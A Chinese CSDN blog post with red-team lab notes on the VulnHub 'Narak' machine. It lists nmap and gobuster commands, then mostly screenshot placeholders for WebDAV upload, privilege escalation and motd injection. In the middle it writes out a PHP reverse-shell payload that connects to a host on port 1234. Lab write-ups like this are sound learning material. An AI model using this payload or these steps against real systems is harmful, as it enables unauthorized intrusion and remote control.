Narak

最新推荐文章于 2024-05-23 08:24:24 发布
最新推荐文章于 2024-05-23 08:24:24 发布
阅读量45 收藏
点赞数
分类专栏: 红队笔记专栏 文章标签: Linux 网络安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61427044/article/details/131499108
版权

靶机精讲 之 Narak

[22,80]
# C scan
sudo nmap -sn 192.168.28.0/24
# Port scan
sudo nmap -sT --min-rate 10000 -p- 192.168.28.23
# Detail scan
sudo nmap -sT -sV -sC -p22,80 192.168.128.23 -oA nmapscan/detail
# UDP scan
sudo nmap -sU --min-rate 10000 -p- 192.168.28.23

# 目录爆破
sudo gobuster dir -u http://192.168.28.23 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

C段扫描

image-20230531135426736

端口扫描

image-20230531135535709

详细信息扫描

image-20230531141527595

二次扫描

image-20230531141945919

UDP扫描

image-20230531141346818

调整参数后的 UCP扫描

image-20230531142114176

image-20230531142130491

tftp

image-20230531142542821

image-20230531142643944

80 Port

image-20230531140753230

目录爆破

image-20230531141635375

image-20230531141807107

davtest工具

image-20230531142851145

image-20230531142859469

cadaver工具

image-20230531143047237

可以上传并构造PHP,编写PHP的反弹shell。

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.28.9/1234 0>&1'"); ?>

image-20230531152155744

image-20230531152255285

image-20230531152321210

image-20230531152356454

提权操作

image-20230531152512360

image-20230531152602321

image-20230531152613234

image-20230531152912513

beef工具

image-20230531153019578

image-20230531153240019

登入用户

image-20230531153406528

image-20230531153429884

image-20230531153602830

写入反弹shell

mtd文件

image-20230531153942936

取得权限

image-20230531154132652

image-20230531154242807

辉小鱼~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub narak
weixin_45682839的博客
10-21 1065
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
攻击narak靶场
qq_62638044的博客
03-16 410
攻击narak靶场
Vulnhub靶机:HA_ NARAK
LainWith的博客
08-03 518
HA(此系列共17台)发布日期:2020年9月23日难度: 中目标: 取得 root 权限 + 2 Flag注释: 使用爆破,使用vmware虚拟机运行主机发现端口扫描信息收集密码字典定制爆破密码webdav漏洞PUT方法上传BF语言解码MOTD注入CVE-2021-3493提权。...
靶机:narak
weixin_50339323的博客
08-04 1530
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
narak靶机总结
weixin_51692662的博客
11-06 610
webdav、narak靶机、motd提权
HA NARAK渗透测试
Jianmuhtb的博客
07-29 226
解得一个明文:chitragupt,猜测是某个用户的密码,因为前面的update-motd.d下的文件是需要ssh用户登录之后才会以root权限执行,所以提示应该是一个用户的密码,并且要用ssh登录,后面经过尝试,是inferno的密码。cat hell.sh发现里面的内容是密文,经过了解,这是brainfuck加密方式,并且发现任何用户都可以对update-motd.d下的文件写操作。反弹的用户为www用户,在/home/inferno/user.txt中获取到flag1。看一下有什么权限,没什么收货。
narak靶机打靶过程及思路
qq_52610024的博客
05-19 238
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
vulnhub之narak
weixin_54431413的博客
06-26 389
从web端入手,cewl进行定制字典,hydra对webdav进行爆破,davtest上传php反弹shell,unbuntu内核漏洞提权,查找相关文件命令(-perm),motd注入更改root密码,
【vulnhub】narak
开心星人的博客
06-29 764
主机发现 192.168.0.104 是靶机ip,因为VMware Inc端口扫描 ssh服务和http服务访问一下80端口 是个图片展示 翻到最后,Do Not Click 点一下 看这个url 到了这个目录遍历页面,不知道会不会有PUT文件上传之类的漏洞 常规扫目录 没有权限访问webdav 需要账号密码。 webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。继续看别的吧 收集一下信息 这一步其实没啥意义,但有时候可能会有用cwel爬取网页的账
靶机练习 narak ,个人学习心得
09-08
学习
Google搜索引擎算法的秘密
05-18
Google搜索引擎算法的秘密
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8236
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
linux---进程通信
m0_74979625的博客
05-17 640
提示:以下是本篇文章正文内容,下面案例可供参考。
Linux —— 信号量
qq_67693066的博客
05-21 686
Linux —— 信号量
Linux 三十六章
一怀明月的博客
05-17 1134
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
Linux “如何添加用户/组和修改用户/组”
y2162484776的博客
05-20 492
我们首先要知道Linux中用户时必须的吗!???用户是标识计算机的资源归属的。
linux中重定向正则输出
2401_83366291的博客
05-16 1100
通配符是对文件名进行匹配,正则表达式是对文件中的内容进行匹配。作用:通过对文本中内容进行过滤,然后对文件中的内容进行过滤。> 将文件中原有的内容全部删除,然后进行写入。&& 只有前面的命令执行成功,后面的命令才会执行。作用:将本来要显示在终端上的信息重定向到一个文件中。例子:从b.txt文件中过滤出包含a.txt的行。例子:从a.txt文件中过滤出不包含b.txt。>> 在文件原有的内容,追加新的内容。2>将文件中原有的内容全部删除,然后进行写入。
Linux 内核开发 25 - 中的 cpuidle subsystem 介绍
jxusthusiwen的专栏
05-16 568
总的来说, cpuidle 子系统是 Linux 内核中实现 CPU 电源管理的重要组件,通过动态检测 CPU 的使用状态,选择合适的低功耗状态,并提供统一的管理接口,从而提高系统的能源效率。2. 选择低功耗状态:cpuidle 子系统会根据当前 CPU 的状态和系统的需求,选择最合适的低功耗状态,例如 C1、C2、C3 等。3. 进入低功耗状态:cpuidle 子系统会调用特定的 CPU 指令将 CPU 切换到选择的低功耗状态,需要先保存 CPU 的上下文。
rpm与yum方式、命令
最新发布
jingyu飞鸟
05-23 222
目录系统安装软件方式1、rpm方式命令yum方式安装更新和升级查找与显示删除程序清除缓存仅下载优点:无需网络安装软件缺点:无法解决软件依赖安装 --nodeps忽略依赖关系 --force强行安装rpm -Uvh升级安装,未装则安装rpm -Fvh更新安装,未装则不装rpm -e卸载(--nodeps忽略依赖,强制卸载)rpm -q查看软件是否安装一般使用rpm -qa|grep 软件名过滤rpm -ql查看软件所有的安装文件列表rpm -qc查看软件的配置文件rpm -qd查看软件的模板文

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值